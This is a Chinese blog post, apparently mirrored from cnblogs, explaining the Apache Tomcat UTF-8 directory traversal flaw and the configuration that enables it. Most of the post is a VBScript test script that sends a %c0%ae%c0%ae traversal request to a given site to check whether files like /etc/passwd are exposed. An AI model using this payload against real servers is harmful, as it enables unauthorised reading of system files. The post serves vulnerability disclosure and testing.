zoukankan      html  css  js  c++  java
  • Apache Tomcat UTF8编码漏洞

    呵呵,Apache Tomcat出了一个类似当年IIS url 编码的漏洞。既然CVE已经已经公布了,我也来发一下吧!

    漏洞发生在Apache Tomcat处理UTF-8编码时,没有正确转换,从而导致在处理包含%c0%ae%c0%ae的url时转换为类似../的形式,使得可以遍历系统任意文件,包括

    /etc/passwd等

    触发的条件为Apache Tomcat的配置文件context.xml 或 server.xml 的'allowLinking' 和 'URIencoding' 允许'UTF-8'选项

    漏洞测试代码如下:

    Dim strUrl,strSite

    showB()
    Set Args = Wscript.Arguments

    If Args.Count <> 1 Then
    ShowU()
    Else
    strSite=Args(0)
    End If

       strUrl="/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar"

       Set objXML = CreateObject("Microsoft.XMLHTTP")
       objXML.Open "GET",strSite & strUrl, False
       objXML.SetRequestHeader "Referer", strSite 

       objXML.send()

    if objXML.status=200 then
       wscript.echo("存在漏洞")

    end if

    Sub showB()
    With Wscript
       .Echo("+--------------------------=====================------------------------------+")
       .Echo("Exploit Apache Tomcat UTF-8")
       .Echo("Code By Safe3")
       .Echo("+--------------------------=====================------------------------------+")
    End with
    End Sub
    Sub showU()
    With Wscript
       .Echo("+--------------------------=====================------------------------------+")
       .Echo("用法:")
       .Echo(" cscript "&.ScriptName&" site")
       .Echo("例子:")
       .Echo(" cscript "&.ScriptName&" http://www.example.com >result.txt")
       .Echo("+--------------------------=====================------------------------------+")
       .Quit
    End with
    End Sub

  • 相关阅读:
    velocity masterplate 第一个程序的运行
    java 关于集合框架
    java 关于>>>位运算
    QCA wifi驱动强制为HT40
    Linux内核调试方法的总结(转载)
    移动端利用webkitbox水平垂直居中
    Under Construction to Beta
    网站自动备份
    writely 邀请?
    Google Carlendar coming ?
  • 原文地址:https://www.cnblogs.com/Safe3/p/1265622.html
Copyright © 2011-2022 走看看